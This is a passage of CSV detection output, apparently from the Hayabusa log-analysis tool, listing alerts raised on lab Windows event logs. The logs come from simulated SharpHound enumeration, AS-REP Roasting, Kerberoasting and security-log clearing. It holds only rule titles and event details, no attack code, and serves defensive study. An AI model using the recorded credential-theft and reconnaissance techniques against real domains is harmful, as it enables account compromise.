+09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.980 
+09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : 
Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge 
Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 
0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 
17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 
0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
-2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
